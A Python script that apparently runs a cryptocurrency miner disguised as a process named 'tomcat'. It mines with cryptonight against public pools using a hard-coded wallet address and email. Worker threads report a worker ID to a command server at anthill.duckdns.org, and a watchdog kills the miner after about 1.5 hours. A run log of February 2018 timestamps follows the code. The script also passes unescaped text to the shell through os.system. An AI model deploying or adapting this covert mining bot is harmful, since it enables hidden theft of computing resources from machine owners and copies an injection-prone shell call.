import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:04.805220
#2018-02-17 17:09:07.540534
#2018-02-17 18:57:01.964827
#2018-02-17 20:45:08.525375
#2018-02-17 22:32:07.354898
#2018-02-18 00:16:04.612107
#2018-02-18 02:07:01.958533
#2018-02-18 03:53:06.407350
#2018-02-18 05:39:04.642111
#2018-02-18 07:31:06.679066
#2018-02-18 09:19:04.992044
#2018-02-18 11:05:05.035265
#2018-02-18 12:52:01.812001
#2018-02-18 14:38:02.113289
#2018-02-18 16:27:06.005474
#2018-02-18 18:16:07.661410
#2018-02-18 20:03:04.223427
#2018-02-18 21:50:05.868728
#2018-02-18 23:39:03.632849
#2018-02-19 01:25:07.392009
#2018-02-19 03:13:07.303874
#2018-02-19 04:58:07.407707
#2018-02-19 06:43:07.182941
#2018-02-19 08:34:07.143975
#2018-02-19 10:23:04.159950
#2018-02-19 12:11:06.923892
#2018-02-19 13:58:03.964208
#2018-02-19 15:47:04.489501
#2018-02-19 17:36:02.141545
#2018-02-19 19:24:04.638928
#2018-02-19 21:12:04.336981
#2018-02-19 22:58:01.292980
#2018-02-20 00:41:08.196763
#2018-02-20 02:31:03.740523
#2018-02-20 04:20:07.826612
#2018-02-20 06:04:03.980292
#2018-02-20 07:49:05.179973
#2018-02-20 09:34:05.740311
#2018-02-20 11:17:09.985689
#2018-02-20 13:04:07.849564
#2018-02-20 14:48:08.966919
#2018-02-20 16:35:02.944105
#2018-02-20 18:21:05.016416
#2018-02-20 20:13:06.943594
#2018-02-20 21:59:01.669655
#2018-02-20 23:41:05.661026
#2018-02-21 01:27:03.773567
#2018-02-21 03:16:06.635222
#2018-02-21 05:03:04.674984
#2018-02-21 06:51:04.932441
#2018-02-21 08:36:07.695804
#2018-02-21 10:22:06.920289
#2018-02-21 12:10:10.890340
#2018-02-21 14:00:13.504625
#2018-02-21 15:46:01.776340
#2018-02-21 17:38:07.102030
#2018-02-21 19:24:07.672563
#2018-02-21 21:11:06.955997
#2018-02-21 22:57:07.509648
#2018-02-22 00:46:06.565864
#2018-02-22 02:34:02.115573
#2018-02-22 04:20:06.345026
#2018-02-22 06:05:06.306749
#2018-02-22 07:50:08.359414
#2018-02-22 09:39:04.974599
#2018-02-22 11:24:07.073243
#2018-02-22 13:11:01.283606
#2018-02-22 15:02:07.341010
#2018-02-22 16:47:02.166410
#2018-02-22 18:33:06.126226
#2018-02-22 20:24:04.034825
#2018-02-22 22:10:10.425283
#2018-02-22 23:57:02.008475
#2018-02-23 01:44:08.058792
#2018-02-23 03:34:08.064201
#2018-02-23 05:18:04.299069
#2018-02-23 07:03:06.554867
#2018-02-23 08:51:06.988885
#2018-02-23 11:07:05.778372
#2018-02-23 13:00:10.511531
#2018-02-23 14:44:03.646514
#2018-02-23 16:32:04.901786
#2018-02-23 18:19:01.592702
#2018-02-23 20:04:01.652442
#2018-02-23 21:47:03.805738
#2018-02-23 23:39:06.560073
#2018-02-24 01:27:02.228598
#2018-02-24 03:18:07.641401
#2018-02-24 05:03:05.087527
#2018-02-24 06:52:01.503360
#2018-02-24 08:41:07.259181
#2018-02-24 10:25:06.558250
#2018-02-24 12:20:07.118296
#2018-02-24 14:11:07.532333
#2018-02-24 15:58:01.669118
#2018-02-24 17:48:07.723563
#2018-02-24 19:36:03.996922
#2018-02-24 21:23:04.310042
#2018-02-25 01:14:02.078730
#2018-02-25 05:04:05.052408
#2018-02-25 10:03:01.747544